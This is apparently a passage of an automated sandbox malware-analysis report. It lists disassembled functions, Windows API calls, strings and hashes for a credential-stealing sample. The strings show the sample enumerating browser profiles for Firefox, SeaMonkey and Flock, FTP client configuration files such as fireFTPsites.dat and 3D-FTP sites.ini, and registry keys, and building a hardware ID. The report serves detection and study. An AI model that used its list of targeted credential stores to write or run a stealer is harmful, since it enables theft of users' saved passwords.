Part of subcall function 00401C93: lstrlenA.KERNEL32(?), ref: 00401CB4
Part of subcall function 00401C93: lstrlenA.KERNEL32(00000000,?), ref: 00401CBE
Part of subcall function 00401C93: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401CD2
Part of subcall function 00401C93: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401CDB

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

\Mozilla\Firefox\, xrefs: 00409C28, 00409C67, 00409C84
fireFTPsites.dat, xrefs: 00409C39
Firefox, xrefs: 00409C6C, 00409C89
Software\Mozilla, xrefs: 00409C71, 00409C8E

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
API String ID: 3007406096-624000163
Opcode ID: 4205abf1ae99089d99fdde2c5ac3b2e758e1189a6140887c775feb9597ca6d8e
Instruction ID: a48b09e3ff263b956425435e1e973b4a862e31945ba7e1c7766568fe2e47dd34
Opcode Fuzzy Hash: 4205abf1ae99089d99fdde2c5ac3b2e758e1189a6140887c775feb9597ca6d8e
Instruction Fuzzy Hash: 55011E707802087ADB117F61CC47FDD7A299B40749F61807ABA04750E3DABDDAD09A5D

Function 00610183 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00000000,-00000001,?,00000040), ref: 006100AE
VirtualProtect.KERNEL32(00000000,?,00000040,00000040), ref: 00610130
VirtualProtect.KERNEL32(00000000,-00000001,?,00000040), ref: 00610322

Strings

@, xrefs: 006101D8
zL, xrefs: 00610125
@, xrefs: 0061010B

Memory Dump Source

Source File: 00000000.00000003.1684799843.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_610000_8WgZHDQckx.jbxd

Similarity

API ID: ProtectVirtual
String ID: @$@$zL
API String ID: 544645111-2217806029
Opcode ID: c60573fa20f832fa536501792543f4d8d3be2452eda2f2eaa3e02385dc478f35
Instruction ID: 7d4256c3c6addb2020e5fdbd427e3beba80e166ffb9a0b3fe6fa51a68004c5eb
Opcode Fuzzy Hash: c60573fa20f832fa536501792543f4d8d3be2452eda2f2eaa3e02385dc478f35
Instruction Fuzzy Hash: B5519175D01208EFDF09CF98D995ADDBBB2BF88301F288159E8056B359D734AA81CF94

Function 00409A76 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85registryCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(?,?), ref: 00409A82
RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D

Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9

Part of subcall function 00401C93: lstrlenA.KERNEL32(?), ref: 00401CB4
Part of subcall function 00401C93: lstrlenA.KERNEL32(00000000,?), ref: 00401CBE
Part of subcall function 00401C93: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401CD2
Part of subcall function 00401C93: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401CDB

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

PathToExe, xrefs: 00409A8D

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
String ID: PathToExe
API String ID: 3012581338-1982016430
Opcode ID: 2289f49dd118580c98bbccf2d357f7e95b01b49dda2c0e7527473f5d09d8cc53
Instruction ID: 1d76cd23fb074dc89dad06d858ab6b246b3fa36e68aacfab6f2579017d8d32a0
Opcode Fuzzy Hash: 2289f49dd118580c98bbccf2d357f7e95b01b49dda2c0e7527473f5d09d8cc53
Instruction Fuzzy Hash: 0D31DB31D50109BAEF11AFA1CC42EEE7E75BF04344F50443AB610B41F2DBB99A60AB69

Function 0040263E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104,?), ref: 00402674
GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 004026F6
GlobalLock.KERNEL32(?), ref: 00402702
GlobalUnlock.KERNEL32(?), ref: 00402724

Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87

Part of subcall function 00401C93: lstrlenA.KERNEL32(?), ref: 00401CB4
Part of subcall function 00401C93: lstrlenA.KERNEL32(00000000,?), ref: 00401CBE
Part of subcall function 00401C93: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401CD2
Part of subcall function 00401C93: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401CDB

Strings

Software\WinRAR, xrefs: 0040264E

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: lstrlen$Global$lstrcatlstrcpy$FromLockPathStreamTempUnlock
String ID: Software\WinRAR
API String ID: 2536169780-224198155
Opcode ID: 1a0aa574539de05215a3ce9fdb3959ce73ebeff3f84587210906ef20e334f391
Instruction ID: 7ce4eb711e86f92b68206b460616100140319674e48074a54c1daa36c09b920a
Opcode Fuzzy Hash: 1a0aa574539de05215a3ce9fdb3959ce73ebeff3f84587210906ef20e334f391
Instruction Fuzzy Hash: BE21EB71D0010DBBDF11ABB1CD86DDE7B69AF04348F1044B6B604F61F2D6BD8A90AB18

Function 0040464E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00404664
RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000,?,?), ref: 0040469D
StrStrIA.SHLWAPI(?,Line), ref: 004046CE
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000001,00000000,00000000,?,Line), ref: 00404753

Strings

Line, xrefs: 004046C2

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpenValue
String ID: Line
API String ID: 4012628704-1898322888
Opcode ID: 7cba35f3077d9f48ee68726b6cc6e3e229af39bee818edf4340032195014823b
Instruction ID: be7aa309fd3f993b02d7590f1dd93621f343519f9d7ecdca5b31e4b1a8e2e83c
Opcode Fuzzy Hash: 7cba35f3077d9f48ee68726b6cc6e3e229af39bee818edf4340032195014823b
Instruction Fuzzy Hash: ED212AB180010CBACF21AB50CC41BED7BB9BF41304F1085B6F605B50A0DBBA9B959F99

Function 0040E1AB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E1BE
RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E1F7
StrStrIA.SHLWAPI(?,.wjf), ref: 0040E23E
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E26B

Strings

.wjf, xrefs: 0040E233

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpenValue
String ID: .wjf
API String ID: 4012628704-198459012
Opcode ID: f16434eb568557e5d773a2e30f854150d0129578811892dcd54a2da775d95354
Instruction ID: 83cd423dfab7f3ce78523b2e43c96a3224d61868d9a123fb196da80e76c6a25e
Opcode Fuzzy Hash: f16434eb568557e5d773a2e30f854150d0129578811892dcd54a2da775d95354
Instruction Fuzzy Hash: 3811E43180410CBADF11AB91CC41AEEBBBDBF04304F0089B6A515B40A1DBB99BA59F99

Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040263E: GetTempPathA.KERNEL32(00000104,?), ref: 00402674
Part of subcall function 0040263E: GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 004026F6
Part of subcall function 0040263E: GlobalLock.KERNEL32(?), ref: 00402702
Part of subcall function 0040263E: GlobalUnlock.KERNEL32(?), ref: 00402724

CoCreateGuid.OLE32(?,00000000), ref: 004043D0
wsprintfA.USER32 ref: 00404417
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404423

Strings

HWID, xrefs: 004043B7, 0040442D
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}, xrefs: 0040440E

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: Global$CreateFromGuidLockPathStreamTempUnlocklstrlenwsprintf
String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
API String ID: 1852535927-1100116640
Opcode ID: 678afb478dcb297b9a40c82344ed684fe2d6c6816f2cb1cf3ba5bb659b5642fa
Instruction ID: 39eda57d1e4ded13cf2467c53634863ea40b69290cc94bf288a4a0d6a76da2b3
Opcode Fuzzy Hash: 678afb478dcb297b9a40c82344ed684fe2d6c6816f2cb1cf3ba5bb659b5642fa
Instruction Fuzzy Hash: 4C1127A68041987DDB61D2E64C51DFFBAFC5D0D205B5800ABBAA0F20C2D67D87409B38

Function 00409CBB Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409CE9

Part of subcall function 00409A76: StrStrIA.SHLWAPI(?,?), ref: 00409A82
Part of subcall function 00409A76: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
Part of subcall function 00409A76: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
Part of subcall function 00409A76: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409D2E

Strings

SeaMonkey, xrefs: 00409CF3, 00409D10
Software\Mozilla, xrefs: 00409CF8, 00409D15
\Mozilla\SeaMonkey\, xrefs: 00409CEE, 00409D0B

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: SeaMonkey$Software\Mozilla$\Mozilla\SeaMonkey\
API String ID: 3062143572-164276155
Opcode ID: cfeefedc208ba1b3a158d02969ec9bf6b73c8418a662f19825f7b3feef0c061e
Instruction ID: 5655a4762ef1ec6e9dd1e1728c7ffd47c60bddb1b6fa57ef8374201fc086bd1c
Opcode Fuzzy Hash: cfeefedc208ba1b3a158d02969ec9bf6b73c8418a662f19825f7b3feef0c061e
Instruction Fuzzy Hash: 56F01D70780208BACB11BF61DC47FC97A659B14B48F61C06AB609750E6DAB9CAD09B4D

Function 00409D42 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409D70

Part of subcall function 00409A76: StrStrIA.SHLWAPI(?,?), ref: 00409A82
Part of subcall function 00409A76: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
Part of subcall function 00409A76: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
Part of subcall function 00409A76: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409DB5

Strings

\Flock\Browser\, xrefs: 00409D75, 00409D92
Software\Mozilla, xrefs: 00409D7F, 00409D9C
Flock, xrefs: 00409D7A, 00409D97

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Flock$Software\Mozilla$\Flock\Browser\
API String ID: 3062143572-1276807325
Opcode ID: 3f712649621526bde9587fe4487f4491b0f00e7a5a129f20ff6db4e6b027a248
Instruction ID: 09e756c12b8c31d393a996039f8f363fea179afbecdec63c6c31eda142224f35
Opcode Fuzzy Hash: 3f712649621526bde9587fe4487f4491b0f00e7a5a129f20ff6db4e6b027a248
Instruction Fuzzy Hash: B6F0BD74B40208BADB11BF62CC43FC97A659B04748F618066BA08751E2DAB9DBD09B5D

Function 00409DC9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409DF7

Part of subcall function 00409A76: StrStrIA.SHLWAPI(?,?), ref: 00409A82
Part of subcall function 00409A76: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
Part of subcall function 00409A76: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
Part of subcall function 00409A76: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409E3C

Strings

Software\Mozilla, xrefs: 00409E06, 00409E23
Mozilla, xrefs: 00409E01, 00409E1E
\Mozilla\Profiles\, xrefs: 00409DFC, 00409E19

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
API String ID: 3062143572-2716603926
Opcode ID: d39e9b962fab1e5d7928343fc2e4ed07076092eef11679877b92ec2f860963f9
Instruction ID: 8905593ad34adf5734f7ff0091e5010f1ee6da67e115286792317178a7508775
Opcode Fuzzy Hash: d39e9b962fab1e5d7928343fc2e4ed07076092eef11679877b92ec2f860963f9
Instruction Fuzzy Hash: AAF01D74740208BACB11BF61CC47FC97A669B40708F61C066B608750E2DEB9DAD09B4D

Function 00409B7E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409BAC

Part of subcall function 00409A76: StrStrIA.SHLWAPI(?,?), ref: 00409A82
Part of subcall function 00409A76: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
Part of subcall function 00409A76: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
Part of subcall function 00409A76: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409BF1

Strings

\Mozilla\Firefox\, xrefs: 00409BB1, 00409BCE
Firefox, xrefs: 00409BB6, 00409BD3
Software\Mozilla, xrefs: 00409BBB, 00409BD8

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
API String ID: 3062143572-2631691096
Opcode ID: a420107a800d0aea51a075b963a93382334ae6b81802228017219b53d24ef18a
Instruction ID: 39da728a8dd772fc012492a8606a957950a412be68946470c2c3b1256df5a601
Opcode Fuzzy Hash: a420107a800d0aea51a075b963a93382334ae6b81802228017219b53d24ef18a
Instruction Fuzzy Hash: E3F01D70780208BACB11AF61CC47FCD7A659B10748F618066BA08750E3DAB9DAD09B4D

Function 0040C884 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(0084DAA8,3D-FTP), ref: 0040C8AB

Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

\SiteDesigner, xrefs: 0040C91F
sites.ini, xrefs: 0040C8C4, 0040C901, 0040C930
\3D-FTP, xrefs: 0040C8F0
3D-FTP, xrefs: 0040C8A5

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: 3D-FTP$\3D-FTP$\SiteDesigner$sites.ini
API String ID: 1884169789-4074339522
Opcode ID: c8b0f8b757ce26d72b0da341d4946173f45a57fc4635effd9c8d4719e86838c4
Instruction ID: 3ed0a44d9d727cfda3b189301b3541e70d32bec96f8b0253371e2d977f848347
Opcode Fuzzy Hash: c8b0f8b757ce26d72b0da341d4946173f45a57fc4635effd9c8d4719e86838c4
Instruction Fuzzy Hash: 63119470680201B9FB2137718C86FBE295A5B80758F50863BB924F51E6DABCDE81926C

Function 0040AD02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040AD18
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040AD4C
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040AE34

Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AAD5
Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AAE8
Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AAFB
Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AB0E
Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AB21
Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AB34
Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AB47

Strings

SiteServers, xrefs: 0040AD86

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: wsprintf$CloseEnumOpen
String ID: SiteServers
API String ID: 1693054222-2402683488
Opcode ID: 16afd5074d53212dab4078331545ebc678f267d3bd3860d33af0478d1fbc4d8b
Instruction ID: 1594223e70be582826d3cd72c9e653209158aad9ce7b8d71cc8a136c09d12af5
Opcode Fuzzy Hash: 16afd5074d53212dab4078331545ebc678f267d3bd3860d33af0478d1fbc4d8b
Instruction Fuzzy Hash: 8231EE31C0021CEADF21AB50CD42BDDB6BABF04305F54C1B6B148711A1CB795F92AF9A

Function 004017BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetHGlobalFromStream.OLE32(?,?), ref: 004017CD
GlobalLock.KERNEL32(?), ref: 004017E8

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

GlobalUnlock.KERNEL32(?), ref: 00401846

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

PKDFILE0YUICRYPTED0YUI1.0, xrefs: 00401855

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: Global$Local$AllocFreeFromLockStreamUnlock
String ID: PKDFILE0YUICRYPTED0YUI1.0
API String ID: 1329788818-258907703
Opcode ID: e27496e4e278894c0b3e5b7b39f84aede61374fdaa4238e772ed75dd8da7f228
Instruction ID: be41527f65bf325794da2c557c45d76ae318438bbd6ce9b0a91f8e97d3889ae7
Opcode Fuzzy Hash: e27496e4e278894c0b3e5b7b39f84aede61374fdaa4238e772ed75dd8da7f228
Instruction Fuzzy Hash: 0321CDB2D00109BBDF017FA1CC42AAD7E75EF14344F10817ABA14B51B1E77A9B619B98

Function 00408B58 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408B6B
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408B9F
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408C3E

Strings

MRU, xrefs: 00408BD7

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: MRU
API String ID: 1332880857-344939820
Opcode ID: 022f83d8a6890e340b05324591a2bc82ad8fc555889ed682fd12a25f305b928e
Instruction ID: e378fe83f72561d05cfb7ba527c10ba2c43f762826e40f39a0f57b05cc83cf8b
Opcode Fuzzy Hash: 022f83d8a6890e340b05324591a2bc82ad8fc555889ed682fd12a25f305b928e
Instruction Fuzzy Hash: DF212C7180010CBADF21AF51CD42FDD7BBABF00304F1085BAB544B51A1DBB95B919F99

Function 00401AD4 Relevance: 6.1, APIs: 4, Instructions: 87registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00401B19
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401B34
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,00000000,?,?,?,00000000), ref: 00401B6A
RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401B8C

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
